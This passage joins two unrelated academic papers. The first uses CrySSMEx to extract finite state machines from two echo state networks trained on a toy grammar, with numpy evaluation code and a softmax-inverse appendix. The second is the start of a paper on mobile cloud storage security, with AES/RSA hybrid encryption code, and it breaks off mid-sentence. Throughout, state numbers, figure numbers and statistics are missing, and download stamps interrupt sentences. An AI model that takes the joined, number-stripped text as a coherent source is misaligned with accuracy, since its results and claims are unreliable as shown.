extracting fsms. extracting an fsm from an rnn requires symbolic input and output, since an fsm's transitions and states come with a finite set of unique labels. the network inputs in our simulations represent words, so denoting them by symbols is straightforward. the networks' outputs, however, are not symbols but probability distributions. these continuous-valued vectors need to be discretised into symbols before cryssmex can be applied. the particular choice of output symbols is very important for the analysis. in the extreme case that all network outputs are given the same label, the resulting machine will have only one state and be completely uninformative. in contrast, choosing an output discretisation that is too fine-grained yields 'bloated' and incomprehensible fsms. therefore, the granularity of the discretisation should be fine enough for the symbols to be meaningful, but no finer than required for the issue under investigation. here, we make use of the fact that all words within each of the five syntactic categories (noun, verb, preposition, that, and [end]) are equivalent according to the language's grammar. this means that syntactic categories are just as meaningful as words, making a discretisation of output vectors into words overly fine-grained. we therefore turn these vectors into symbols corresponding to the five syntactic categories. this is done by summing the activations of all output units representing words from the same category. the category with the highest total activation (i.e., the most probable one) is considered to be the output symbol of the network. summing over words of a category does not give an unfair advantage to the categories with many words (such as the nouns) over those with few words (such as the single-word category 'relative clause marker'). this is because, if some noun is possible according to the grammar, any noun is possible. therefore, the network needs to spread the total probability mass for 'nouns' over all individual nouns, whereas the total probability of the 'relative clause marker' goes to the single output unit representing the word that.

results

network performance. the networks' prediction error on test sentences is shown in the left panel of figure . as expected, esn+ does better than the standard esn. this is true in particular at the sentence-final verb, that is, when having to predict [end].

figure . prediction error of esn and esn+ at each word of test sentences (left) and training sentences with the same structure (right). results are averaged over sentences; the ones shown on the x-axes are just examples. [the y-axis shows the kl-divergence; the x-axes list the words of an example test sentence (boys like girls that men see [end]) and an example training sentence of the same structure.]

eleven of the training sentences are of the form 'nfem v nmale that nfem v [end]', that is, they have the same structure as the test sentences. the right panel of figure shows the networks' performance on these training sentences.
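the two evaluation ingredients just described, the kl-based prediction error and the category-level output symbols, can be sketched as follows, assuming numpy. the direction of the divergence (true distribution relative to the model output) is one natural reading of the description above, and the category membership lists simply mirror the grammar.

```python
import numpy as np

CATEGORIES = {
    "N": ["women", "girls", "sisters", "men", "boys", "brothers",
          "bats", "giraffes", "elephants", "dogs", "cats", "mice"],
    "V": ["chase", "see", "swing", "love", "avoid", "follow", "hate", "hit", "eat", "like"],
    "P": ["from", "with"],
    "that": ["that"],
    "[end]": ["[end]"],
}

def kl_divergence(p_true, q_model, eps=1e-12):
    """D(p_true || q_model): prediction error of the model output against the grammar."""
    p = np.asarray(p_true, dtype=float)
    q = np.asarray(q_model, dtype=float) + eps
    mask = p > 0
    return float(np.sum(p[mask] * np.log(p[mask] / q[mask])))

def output_symbol(a_out, vocab):
    """discretise an output vector into one of the five syntactic categories by
    summing the probability mass of all words belonging to each category."""
    idx = {w: k for k, w in enumerate(vocab)}
    totals = {cat: sum(a_out[idx[w]] for w in words if w in idx)
              for cat, words in CATEGORIES.items()}
    return max(totals, key=totals.get)
```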
again, esn+ does better than esn, but the difference is much smaller than it was for test sentences. interestingly, esn+ performs nearly as well on test sentences as on training sentences, indicating that it has reached the highest level of generalisation that might be expected. the standard esn, on the other hand, performs badly at several points of test sentences compared with the same points on training sentences. . . extracted fsms the quantitative findings presented above are not particularly surprising as they basically form a replication of frank and čerňanský ( ). the contribution of this paper lies in cryssmex’s qualitative analysis of two trained networks and of the difference between them. both networks were given all test sentences as well as all sentences of the form ‘nfem v nmale that nfem v [end]’. these latter sentences could have been in the training set but, as mentioned above, only of them were. during processing of the sentences, the networks’ inputs, internal states, and discretised outputs were recorded. next, cryssmex was applied to these data, for esn and esn+ separately. . . . esn+ figure shows the fsm that cryssmex extracted from the esn+ data after three iterations. this fsm is fully deterministic, indicating that cryssmex has converged after this iteration. the fsm has six states, indicated by the circles numbered – . the machine moves from one state to the next when it receives as input one of the words in the box connecting the two states. at the beginning of a sentence, the fsm must be in state since this is the only state that is entered when receiving the input symbol [end]. moreover, there is no other way to enter this state, showing that it does not occur at any other point in the sentence. when in this state, the network predicts the following input to be a noun, and indeed, all sentences of the language start with a noun, moving the fsm into state . here, it predicts the next word to be a verb, irrespective of whether the input was a male or a female noun. this is remarkable because in the network training data, a verb can only follow a male noun in some src constructions, such as mice that d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h s.l. frank and h. jacobsson :n boys, brothers, men, girls, sisters, women :v avoid, bump, chase, eat, like, follow, hit, love, see, swing :n boys, brothers, men, girls, sisters, women :[end] [end]that :n boys, brothers, men, girls, sisters, women :v avoid, bump, chase, eat,like, follow, hit, love, see, swing figure . final finite state machine extracted from esn+. circles denote network states. the symbol inside a circle is the output symbol (syntactic category) generated from that state. words in boxes are the input symbols (words) that move the automaton from one state to the next. d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h connection science like men chase cats [end]. only times in the training sentences did a verb directly follow a male noun, and never at the beginning of a sentence. the correct prediction of a verb in state , therefore must result from the previous input being a ‘subject’ and not just a ‘male noun’. that is, esn+ is more sensitive to the grammatical role of the noun than to its identity. otherwise, it would not have predicted a verb to come next. 
in fact, the fsm of figure makes no difference whatsoever between male and female nouns: whenever a noun allows for a particular state transition, all nouns do. this means that all nouns are equivalent to the fsm, even though male and female nouns are restricted to particular grammatical roles in training sentences. in other words, the network from which the fsm was extracted shows perfect generalisation to test sentences. after receiving the sentence’s second word (a verb), the fsm moves to state , where it predicts the next input to be a noun. indeed a noun occurs next, moving the fsm to state . here, the end-of-sentence marker is predicted, which is incorrect in the sense that the sentence is not yet over. however, it is a grammatically correct prediction: [end] can indeed follow ‘n v n’. after receiving that, the fsm is in state , where the next input is predicted to be a noun, that is, an orc is expected. it may seem surprising that the fsm never expects an src at this point (i.e., it never predicts a verb) even though that would be perfectly grammatical. presumably, a noun is always expected here because orcs occur more often than srcs: according to the grammar of table , orcs are % more frequent than srcs. the next two inputs are a noun (moving the system into state ) and a (correctly predicted) verb. the fsm ends up in state , where it correctly predicts [end]. it is now back in its starting state. no error (i.e., no grammatically incorrect prediction) was made in processing any of the sentences. . . . echo state networks first iteration. figure shows the fsm extracted from the esn data after the first cryssmex iteration. it has only three states at this point, but cryssmex did not yet terminate as is apparent from the fsm being stochastic: in many cases, a particular input word licences several transitions from the same state. for example, if the fsm is in state and receives the word brothers, it moves to state (where it predicts a verb) in only % of the cases. alternatively, it can remain in state and predict another noun to come next. that prediction is ungrammatical because a noun can never directly be followed by a noun. yet, in over % of the cases, receiving a noun in state results in the ungrammatical prediction of a noun. looking at figure , esn seems to perform only slightly worse than esn+ after noun inputs. we can now conclude that this is somewhat misleading. the small quantitative advantage of esn+ over esn (at noun inputs) in fact corresponds to a very large qualitative improvement: whereas esn+ makes no errors, esn often predicts a noun to follow a noun. it is important to keep in mind that this is not an error of the extracted fsm. it correctly describes the behaviour of the esn, which erroneously predicts a noun to follow a noun. although the fsm is correct in this sense, it is not complete: for instance, it must be in state at the beginning of a sentence (i.e., after processing [end]) but that same state can also be entered after processing a noun or verb. another error that can be observed in the fsm of figure is the occasional prediction of a verb (i.e., being in state ) after processing a verb. although the language does allow for a verb to be directly followed by another (e.g, mice that men like chase cats [end]), this is not possible in any of the ‘n v n that n v [end]’-sentences processed by the fsm. possibly, this error accounts for esn’s low prediction performance (figure ) at the sentence-final verb, that is, when [end] is the only correct prediction. 
further insight into this error can be obtained from the fsm extracted at the second cryssmex iteration.

figure . first (stochastic) finite state machine extracted from esn. if a particular input word licences more than one transition from a state, the probability of a transition is given after the word.

second iteration. in its second iteration, cryssmex splits the three states into seven, resulting in the fsm shown in figure . the fact that it is not deterministic shows that cryssmex has not yet converged, so more iterations are needed for further refinement. although this fsm has only one more state than the one extracted from the esn+ data (figure ), it is much more complex, making it difficult to interpret in full. for this reason, we will not discuss it in depth, but only point out how it sheds light on esn's low prediction performance at the sentence-final verb. also, the fsm shows why there is a large difference between the performance on training and test sentences at this point.

figure . second finite-state machine extracted from esn.

to begin with, note that state must be the sentence-initial state, as it is the only state entered after the input [end]. if the input is a potential training sentence (i.e., 'nfem v nmale that nfem v [end]'), the path through the machine's states is easy to follow. the first word, a female noun, must move the fsm into state , where a verb is correctly predicted. the incoming verb will nearly always result in state , predicting a noun. the following input is a male noun, moving the fsm into state . here, the prediction [end] is grammatical, although the actual next input is that, resulting in state in as much as % of the cases. the incoming female noun will most often put the fsm into state , although states and are also possible. at this point, the only grammatically correct prediction is [end], that is, the fsm should move into state . indeed, a large majority of verb inputs at state yield state , but some errors (i.e., a noun prediction at state ) are also possible. if the fsm was not in state but in state , it cannot end up in the correct state . likewise, if the machine was in state (rather than or ), a verb input is very unlikely to move it to state .

in short, there is not much opportunity for errors in training sentences, except at the sentence-final verb. this finding corresponds to esn's prediction performance on training sentences, as displayed in figure . but how about test sentences? be reminded that after processing the sentence-final verb, the fsm should be in state . this state can be entered from states – and , but only from state is it likely that a verb input results in state . from states – , there is only a very small probability that a verb moves the fsm into state . therefore, we can safely conclude that the machine should be in state immediately before the sentence-final verb arrives. however, note that state can only be entered when the input is a female noun, whereas the actual input at this point in test sentences is always a male noun. hence, when the input is a test sentence, the fsm is not in state when it needs to be. consequently, it will hardly ever predict [end] when it needs to. this explains the large difference in esn prediction error between training and test sentences at the sentence-final verb.

figure . number of states in the fsms extracted from esn, after each cryssmex iteration.

further iterations. as cryssmex continues to extract increasingly deterministic fsms from the esn, the number of states rises sharply, as can be seen in figure . after iterations, cryssmex has converged at an fsm with as many as states.

state-space quantisation. so far, we have only looked into the extracted machines themselves: machines that, to a large extent, reflect the networks' behaviour and grammatical correctness rather than their internal dynamics. in addition to these fsms, cryssmex generates hierarchical descriptions of the networks' state-space quantisations. since these cvq graphs form a rough description of the layout of the state space, they potentially hold important qualitative information about the networks' dynamics. the cvq graph describing the state space of esn+, displayed in figure , shows that esn+ is trivially mapped onto an fsm: it takes at most five quantisations to determine the fsm state for any state vector in the network. for the state space of esn, the situation is remarkably different. figure shows just a small part of the cvq graph corresponding to the first fsm extracted from the esn data (i.e., the one in figure ). this fsm has fewer states than the final machine extracted from esn+, yet the cvq graph is immensely more complex. in short, this tells us that the state space of esn is much more fragmented than that of esn+. consequently, cryssmex needs to work a lot harder to render an fsm description for esn than for esn+.

discussion
comparing network behaviours we have presented the first ever application of cryssmex for a qualitative comparison of the behaviours of two networks. the algorithm proved to provide more insight than was obtained from a merely quantitative investigation of network performance. the difference in performance d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h connection science vq vq vq vq vq vq vq vq vq vq figure . arrangement of vector quantisers (vq) for splitting the esn+ state space (corresponding to the fsm of figure ). the fsm state to which a given state vector belongs is decided by starting at the root vq and following the graph according to the winning model vector of each vq. arrows with a dot denote a merger of states. between esn and esn+ turned out to be the consequence of a much more significant, qualitative difference in their behaviours. comparing the two extracted fsms in figures and , it becomes clear that the two networks implement very different machines. in fact, it is hard to imagine that the rnns that gave rise to these fsms are nearly identical and process the same input sentences. the only difference between esn+ and esn is that the first has input connection weights that were adapted to the training data, whereas the second uses a random permutation of these. apparently, this small difference has immense consequences for the networks’ dynamics and behaviour: esn+ implements a straightforward fsm with six states, whereas the fsm extracted from esn has . even if we restrict ourselves to the non-deterministic, seven-state fsm after the second iteration of cryssmex, the behaviour of esn already turns out to be much more complex than that of esn+. looking at figures and , it becomes clear that a system that should be relatively simple (processing just one type of seven-word sentence) can implement an oversized fsm. the primary d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h s.l. frank and h. jacobsson reason why the esn data causes the extracted fsms to grow so large is that cryssmex will blindly keep refining the extracted rules, also with respect to undesired behaviour by the network. in this case, the desired grammar, as instantiated by esn+, is computationally much simpler than the erratic one instantiated by esn. since cryssmex is ignorant about which behaviour is desired and which is not, it cannot be blamed for creating huge fsms. it merely shows us the networks’ behaviour. the more com- plex that behavior, the more complex the extracted fsm. thanks to the iterative approach of the algorithm, however, the fsms extracted in the first few iterations can be quite informative. although they are incomplete, they may provide a comprehensible ‘summary’ of the complete, but incomprehensible, deterministic fsm that is implemented by the network. . . comparing network state spaces in an early comparison between srns and fsms (servan-schreiber, cleeremans, and mccelel- land ), the term graded state machine was tossed to describe the type of system embodied by an srn. the difference with an fsm is that a graded state machine has (possibly infinite) non-discrete states. each point in an srn’s state space can be considered a state of the machine, and states that are near to each other in the state space tend to (but do not necessarily) result from similar inputs and have similar effects on the network. 
esn+ makes uses of this graded nature of the state space by using inputs that are not truly symbolic. as pointed out by frank and čerňanský ( ), the vector of weights emanating from a particular input unit can be viewed as the representation of the word corresponding to that input, and adapting these weights results in representations that are analogical rather than symbolic: similarities among word representations are analogical to similarities among the grammatical properties of the represented words. more specifically, words from the same syntactic category are represented by vectors that are more similar to each other than vectors representing words from different categories, as is also apparent from figure . each input word drives the activation pattern in esn’s dynamical reservoir towards an attractor point that is unique for that input (tinǒ, čerňanský and beňušková ). because of the analogical nature of word representations in esn+, the attractor points associated with words from the same syntactic category will be closer together than those of words from different categories. as a result, fsm states that are functionally equivalent correspond to esn+ state-space points that are near to one another. such clustering of equivalent states facilitates state-space quantisation. presumably, this is why cryssmex converges after just three iterations when processing the esn+ data. moreover, the state-space clustering improves generalisation. this is because processing a test sentence leads to a state-space trajectory that visits the same clusters that were encountered during esn+ training. in other words, new sentences result in not-so-new internal network states. for esns, however, the situation is radically different. since its input weights are fixed at random values (i.e., it uses symbolic rather than analogical word representations) the distribution of attractors in its state space is basically random. even two states that are functionally equivalent can correspond to distant points in the state space. as a result, many splits and merges are required for a meaningful quantisation, delaying cryssmex convergence and resulting in the highly complex cvq graph, part of which is displayed in figure . also, the generalisation is impaired because the state-space trajectory resulting from a new sentence is largely unrelated to what was encountered during esn training. to summarise, we have found the impoverished generalisation of esn to be related to the relative complexity of its internal dynamics, as apparent from the size of its cvq graph. as mentioned in section . . , the depth and size of cvq graphs are partly governed by the quality of the underlying quantisation algorithm: the worse the quantiser, the larger the cvq d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h connection science vq vq vq vq vq vq vq vq vq vq vq vq vq vq vqvq vq vq vq vq vq vqvq vq vq vq vq vq vq vq vq vqvqvq vq vq vq vq vq figure . small fragment of the arrangement of vector quantisers (vq) for splitting the esn state space (corresponding to the fsm of figure ). graph. hence, the size of the cvq graph for esn (figure ) is partly due to the simplicity of the quantiser that was used, rather than from the actual dynamics of the system. however, the immense difference between the cvq graphs for esn and esn+ cannot all be blamed on the quantiser’s suboptimality. 
therefore, even without a more sophisticated quantisation algorithm, we can provide a reasonable suggestion about what goes on inside the network, and how the dynamics of the two networks underlies their quantitative and qualitative differences. . conclusion cryssmex allows finite state descriptions to be generated from high-dimensional and complex esns, opening up a new window into the internal workings of specific esn instances. in this paper, we have only scraped the surface of the interesting dynamics of esns. only a small step was made towards understanding exactly how and why esn+ manages to utilise its state space in a manner that governs a deeper correspondence to the intended grammar. it is our hope and conjecture that cryssmex may provide much deeper insights into these systems than presented in this paper, insights that may lead to further improvements beyond those of the esn+ model. acknowledgements this research was supported by grant - - from the netherlands organisation for scientific research (nwo) and by eu grant fp - -ip. notes . cryssmex can be downloaded from http://cryssmex.sourceforge.net/ . this is because it has been argued that people only need to experience a word in one grammatical position to generalise it to novel positions. consequently, neural networks should also have this ability in order to be regarded as cognitive models of human language processing (hadley ). d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h s.l. frank and h. jacobsson . note that all nouns within each of the three subcategories (as well as all verbs) are interchangeable in the training sentences. as a result, their representations will become more and more similar as the number of training sentence is increased. . that is, when outputs are discretised by syntactical category. as figure shows, the output vectors of esn+ are not identical to the true probability distributions. references andrews, r., diederich, j. and tickle, a.b. ( ), ‘survey and critique of techniques for extracting rules from trained artificial neural networks’, knowledge based systems, , – . bodén, m. and wiles, j. ( ), ‘context-free and context-sensitive dynamics in recurrent neural networks’, connection science, , – . bullinaria, j.a. and levy, j.p. ( ), ‘extracting semantic representations from word co-occurrence statistics: a computational study’, behavior research methods, , – . čerňanský, m. and tiňo, p. ( ), ‘comparison of echo state networks with simple recurrent networks and variable-length markov models on symbolic sequences’, in artificial neural networks – icann , part i (vol. ), eds. j.m. de sá, l.a. alexandre, w. duch and d.p. mandic, lecture notes in computer science, berlin: springer, pp. – . čerňanský, m. and tiňo, p. ( ), ‘processing symbolic sequences using echo-state networks’, in from associations to rules: proceedings of the th neural computation and psychology workshop, eds. r.m. french, and e. thomas, singapore: world scientific, pp. – . čerňanský, m., makula, m. and beňušková ľ. ( ), ‘improving the state space organization of untrained recurrent networks’, in proceedings of the th international conference on neural information processing, auckland, new zealand. elman, j.l. ( ), ‘finding structure in time’, cognitive science, , – . frank, s.l. ( a), ‘learn more by training less: systematicity in sentence processing by recurrent networks’, connection science, , – . frank, s.l. 
( b), ‘strong systematicity in sentence processing by an echo state network’, in artificial neural net- works – icann , part i (vol. ), eds. s. kollias, a. stafylopatis, w. duch, and e. oja, lecture notes in computer science, berlin: springer, pp. – .. frank, s.l. and čerňanský, m. ( ), ‘generalization and systematicity in echo state networks’, in proceedings of the th annual conference of the cognitive science society, eds. b.c. love, k. mcrae, and v.m. sloutsky, austin, tx: cognitive science society, pp. – . hadley, r.f. ( ), ‘systematicity in connectionist language learning’ mind and language, , – . hopcroft, j. and ullman, j.d. ( ), introduction to automata theory, languages, and compilation, reading, ma: addison-wesley publishing company. jacobsson, h. ( ), ‘rule extraction from recurrent neural networks: a taxonomy and review’, neural computation, , – . jacobsson, h. ( a), ‘the crystallizing substochastic sequential machine extractor: cryssmex’, neural computation, , – . jacobsson, h. ( b), ‘rule extraction from recurrent neural networks’, uppublished doctoral dissertation, department of computer science, university of sheffield, sheffield, uk. jacobsson, h., frank, s.l. and federici, d. ( ), ‘automated abstraction of dynamic neural systems for natural language processing’, in proceedings of the international joint conference on neural networks, orlando, fl, pp. – . jaeger, h. ( ), ‘the “echo state” approach to analysing and training recurrent neural networks’, gmd report no. , gmd – german national research institute for computer science, http://www.faculty.iu- bremen.de/hjaeger/pubs/echostatestechrep.pdf. jaeger, h. ( ), ‘adaptive nonlinear system identification with echo state networks’, in advances in neural infor- mation processing systems (vol. ), eds. s. becker, s. thrun and k. obermayer, cambridge, ma: mit press, pp. – . mirkin, b. ( ), mathematical classification and clustering (vol. ), dordrecht, the netherlands: kluwer academic publishers. servan-schreiber, d., cleeremans, and a. mcclelland, j.l. ( ), ‘graded state machines: the representation of temporal contingencies in simple recurrent networks’, machine learning, , – . tiňo, p., čerňanský, m. and beňušková, ľ. ( ) ‘markovian architectural bias of recurrent neural networks’, ieee transactions on neural networks, , – . tong, m.h., bickett, a.d., christiansen, e.m. and cottrell, g.w. ( ), ‘learning grammatical structure with echo state networks’, neural networks, , – . appendix . inverse of softmax the softmax function (equation ( )) does not have an inverse in general. however, it is possible to define a proper inverse for the particular target vectors that arise in our esn training procedure. d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h connection science we have a network with n output units, one of which (called unit c) represents the correct output for each input vector. in the corresponding target output vector u = (u , . . . , un), element c should have large value (i.e., close to ) whereas all other elements should have small values (i.e., close to ). that is uj = { − �c if j = c �i if j �= c. ideally, �c = �i = , making uc = and ui = . however, the softmax inverse will be applied to u and its domain does not contain and . therefore, we take �c, �i > . also, it is desired that uc > ui , so − �c > �i . from here on, we denote by i all output units that are not c, so always i �= c. note that we assume that the target values �i are equal for all i. 
we are looking for the inverse of the softmax function, that is, we want to find x_i and x_c such that

$$\frac{e^{x_i}}{\sum_{j=1}^{n} e^{x_j}} = \varepsilon_i \quad\text{and}\quad \frac{e^{x_c}}{\sum_{j=1}^{n} e^{x_j}} = 1 - \varepsilon_c. \tag{A1}$$

first, note that $\sum_{j=1}^{n} e^{x_j} = e^{x_c} + (n-1)e^{x_i}$. therefore, equation (A1) becomes

$$e^{x_i} = \varepsilon_i e^{x_c} + \varepsilon_i (n-1) e^{x_i} \quad\text{and}\quad e^{x_c} = (1-\varepsilon_c)e^{x_c} + (1-\varepsilon_c)(n-1)e^{x_i}$$
$$\iff\quad e^{x_c} = e^{x_i}\,\frac{1 - n\varepsilon_i + \varepsilon_i}{\varepsilon_i} \quad\text{and}\quad e^{x_c} = e^{x_i}\,\frac{(1-\varepsilon_c)(n-1)}{\varepsilon_c}$$
$$\iff\quad x_c = \ln\!\left(\frac{1 - n\varepsilon_i + \varepsilon_i}{\varepsilon_i}\right) + x_i \quad\text{and}\quad x_c = \ln\!\left(\frac{(1-\varepsilon_c)(n-1)}{\varepsilon_c}\right) + x_i. \tag{A2}$$

since u_c > u_i, we must have x_c > x_i, so

$$\frac{1 - n\varepsilon_i + \varepsilon_i}{\varepsilon_i} > 1 \iff \varepsilon_i < n^{-1}.$$

from equation (A2), it is clear that

$$\frac{1 - n\varepsilon_i + \varepsilon_i}{\varepsilon_i} = \frac{(1-\varepsilon_c)(n-1)}{\varepsilon_c},$$

which yields ε_c = (n−1)ε_i. this means that ε_i and ε_c cannot be set independently: choosing some minimum target value ε_i < n^{−1} fixes ε_c as well. the total target output is

$$\sum_j u_j = (1 - \varepsilon_c) + (n-1)\varepsilon_i = 1 - (n-1)\varepsilon_i + (n-1)\varepsilon_i = 1.$$

therefore, the target vector forms a probability distribution. by choosing a low enough value for ε_i, the difference between x_c and x_i is fixed as in equation (A2): x_c = ln(ε_i^{−1} − n + 1) + x_i.

as it turns out, it is only this difference that matters in practice: adding a constant value y to x_c and x_i does not change the network's output. let W_{y,out} denote the output connection weights resulting from this addition of y (for convenience, we ignore the bias vector). as in equation (4), A is the matrix of dr states resulting from the training inputs, and U is the matrix of corresponding target outputs. the resulting connection weights are

$$W_{y,\mathrm{out}} = \left(f_{\mathrm{out}}^{-1}(U) + y\mathbf{1}\right)A^{+} = f_{\mathrm{out}}^{-1}(U)A^{+} + y\mathbf{1}A^{+} = W_{\mathrm{out}} + y\mathbf{1}A^{+}.$$

after training, the network receives an input resulting in the dr state a_dr. its output becomes (see equation (2))

$$f_{\mathrm{out}}(W_{y,\mathrm{out}}\, a_{\mathrm{dr}}) = f_{\mathrm{out}}\!\left(W_{\mathrm{out}}\, a_{\mathrm{dr}} + y\mathbf{1}A^{+}a_{\mathrm{dr}}\right),$$

which equals f_out(W_out a_dr) because every element of y1A⁺a_dr is the same constant and the softmax function is translation invariant (i.e., f_{j,out}(x + a) = f_{j,out}(x)). since it does not matter whether the connection weights are W_out or W_{y,out}, adding y to x_c and x_i has no effect. we can therefore simply take x_i = 0. to summarise, all that is needed for training an esn with the softmax output activation is to choose an ε_i < n^{−1}. the softmax inverse of the target outputs then equals

$$f_{j,\mathrm{out}}^{-1}(u) = \begin{cases} \ln(\varepsilon_i^{-1} - n + 1) & \text{if } j = c, \\ 0 & \text{if } j \neq c. \end{cases}$$

international journal of advanced network monitoring and controls, volume , no. ,

a mobile terminal security strategy based on the cloud storage

wang hui, tang junyong
school of computer science and engineering, xi'an technological university, xi'an, china
email: @qq.com

abstract. with the emergence of mass storage systems and the development of distributed file systems, cloud storage has become a focus of the industry. driven by the rapid development of intelligent mobile terminals, cloud storage services for mobile terminals have been put on the agenda. based on an analysis of the architectures of hdfs and dynamo, a mobile terminal security strategy is presented in this paper. database technology and a dynamic consistent hashing algorithm are adopted to deal with different target groups. according to the storage costs of the nodes, data are scheduled in an integrated way by the storage system. to make full use of the advantages of aes (advanced encryption standard) and rsa, a solution that combines the aes and rsa encryption algorithms is proposed to implement mobile terminal cloud storage security.
through the theoretical analysis and the simulation results, the cloud storage strategy proposed in this paper can make the cloud system achieve load balance. moreover, multi-copy mechanism can improve the overall efficiency of the system. keywords: cloud storage, hdfs, dynamo, dynamic consistent hashing algorithm, aes, rsa, multi - copy mechanism . introduction with the rapid development of the internet of things, more and more people are used to using mobile devices such as smart phones to surf the internet, chat, browse news, shopping entertainment, and view all kinds of information. traditional mobile cloud storage systems have lower storage density, the overall storage efficiency is low too. traditional cloud storage systems do not adapt well to different application environment sand do not guarantee the integrity and confidentiality of cloud data. the cloud storage service does not guarantee that the data and operation of mobile users will not be lost, damaged, leaked, or illegally exploited by malicious or non-malicious. so it’s very dangerous for sensitive data to be stored directly in the cloud. simple encryption techniques have key management issues and can’t support complex requirements such as query, parallel modification, and fine-grained authorization. as a result, a mobile cloud storage security technology solution is proposed in this paper, which enables reliable and secure cloud storage. first, the distributed file system (the hadoop distributed file system, hdfs) and dynamo would be compared in this paper, and then the dynamic consistency hash algorithm is introduced to realize the processing of data in different size. according to the storage cost of each storage node, select the optimal storage node to implement the access of mobile cloud storage. the relational database is used for storing indexes in small object files, and the class dynamo system model is used to handle large object files. a mobile terminal security strategy based on the cloud storage the cloud storage system will choose the closest copy when the mobile terminal makes a request. this method can effectively improve the storage efficiency of the cloud system and ensure the load balance of the system. on the basis of implementing the mobile cloud storage, we make full use of advantages of aes and rsa algorithms, a cloud storage security scheme for mobile is proposed in this paper. the solution combines aes and rsa encryption algorithms to improve the shortcomings of the cloud storage system. the reliability model of the cloud storage system is also proposed in the paper. finally, a series of simulation experiments show that the proposed cloud storage security technology scheme is a reliable scheme with higher security. . system architecture of the mobile cloud storag cloud storage is developed on the basis of clustering techniques and embedded virtualized technologies, which is an extension of cloud computing. grid technology, cluster technology and distributed system are used in cloud storage, which coordinated all different types of storage devices in the network. all these technologies and devices can be cooperated with cloud storage to provide the required data storage capabilities and related business visit. cloud storage is not a single storage device. the nature of cloud storage is not storage. the essence of cloud storage is providing services. different ways are taken to deal with different sizes of objects. in this way, system architecture of the mobile cloud storage is designed . 
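the aes–rsa combination referred to above is a standard hybrid scheme: each file is encrypted with a fresh symmetric aes key, and that key is wrapped with the receiver's rsa public key. a minimal sketch follows, assuming the python cryptography package; the key sizes, the use of aes-gcm, and the function names are illustrative choices rather than details taken from this paper.

```python
import os
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

OAEP = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

def encrypt_for_cloud(plaintext: bytes, rsa_public_key):
    """encrypt the file data with a fresh aes key, then wrap that key with rsa."""
    aes_key = AESGCM.generate_key(bit_length=256)
    nonce = os.urandom(12)
    ciphertext = AESGCM(aes_key).encrypt(nonce, plaintext, None)
    wrapped_key = rsa_public_key.encrypt(aes_key, OAEP)
    return wrapped_key, nonce, ciphertext        # all three are stored in the cloud

def decrypt_from_cloud(wrapped_key, nonce, ciphertext, rsa_private_key):
    aes_key = rsa_private_key.decrypt(wrapped_key, OAEP)
    return AESGCM(aes_key).decrypt(nonce, ciphertext, None)

if __name__ == "__main__":
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    blob = encrypt_for_cloud(b"sensitive mobile data", private_key.public_key())
    assert decrypt_from_cloud(*blob, private_key) == b"sensitive mobile data"
```

one practical advantage of generating a fresh aes key per file is that granting or revoking access to a single file only requires re-wrapping that file's key, not re-encrypting the stored data.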
system architecture of the mobile cloud storage is shown in figure . figure. system architecture of the mobile cloud storage users access the network through a mobile terminal. the lowest load in the dispatcher group is selected by the mobile terminal and then communicates with it. depending on the size of the file to determine whether control is handed over to the relational database machine group or to the storage group. small files are handed over to the relational database machine group, and large files are processed by the storage group machine group. the copy mechanism was introduced to improve the reliability of the cloud storage system, multiple-copy mechanism can effectively improve system efficiency. when a mobile terminal makes a request, the closest copy can be chosen. the primary copy would be selected first in traditional cloud storage system. the request is made to the standby copy only when the master copy is wrong. this process affects the speed of the traditional cloud storage system without considering the location of the copy. different storage policies and backup solutions are described in this article, which are used in the relational database machine group and the storage group machine group. international journal of advanced network monitoring and controls volume , no. , . storage policies and backup plans hdfs and dynamo are reliable solutions that are commonly used in the cloud storage system. hdfs is a distributed file system that is suitable for running on common hardware. hdfs has good fault tolerance and can be used for inexpensive hardware. hdfs provides data access mechanisms with high throughput that can be widely applied to large data sets. distributed file systems are developed on the infrastructure of the apache nutch search engine and apply to batch processing for data storage. hdfs emphasizes data throughput rather than response time for accessing data. the program in hdfs has a lot of data sets. file size of the hdfs is typically gigabyte to terabyte. as a result, terabytes of large files can be supported in hdfs through higher aggregated data bandwidth. and hundreds of nodal devices can be contained in a cluster, which allowing the terabytes of large files to be supported in it. dynamo is storage platform of amazon, and the key-value pair is used to store data in the key-value database schema. dynamo has better availability and the higher extensibility. in dynamo, the data are segmented according to the hash algorithm used in distributed file systems. and then all these segmented data are stored in separate nodes. the corresponding node is searched according to the hash value of the key, so that the read operation is realized in dynamo. the consistency hash algorithm is used by dynamo. at that time, it’s not the exact hash value, but a range of hash values. when the hash value of the key is in this range, it will be searched clockwise along the loop, and the first node encountered is what we need. the consistency hash algorithm is improved by dynamo, and in the ring,a set of devices are acted as a node rather than only one device is acted as a node. the synchronization mechanism is used to achieve the consistency of the data. in hdfs the numbers of the copies are set to be . whether the data would be stored in the node or not depends on the capacity of the node. the greater the capacity of the node, the greater the probability that the data will be stored in this node. 
so, when the capacity of the node is quite different, the nodes with large storage capacity in the system would be overloaded. the copy mechanism proposed in this paper can achieve load balancing, and the reliability and availability of cloud storage are also effectively improved. the system replication policy includes dynamic replica policies and static replica policies. the static copy strategy refers to the numbers of copies. the placement is fixed from the start to the data failure. the dynamic copy strategy is a strategy that system can adjust the numbers of copies in real time and their location, depending on performance requirements, load, and so on. the copy strategies for small files and large files are described as follows. . the copy strategy for a small file files that do not exceed mb are defined as small files. the sql server relational database is used as the copy strategy for small files. after receiving the file from the mobile terminal, the dispatcher will judge its size first, and then, once the small file is identified, it will be handed over to the relational database machine group. the correlation properties of the file are stored in the database table. the optimal node with the lightest load is dynamically selected by the database machine group. the lightest load database server in the machine group is selected to store the file, and keep a copy to ensure the reliability of the data. the ip address of 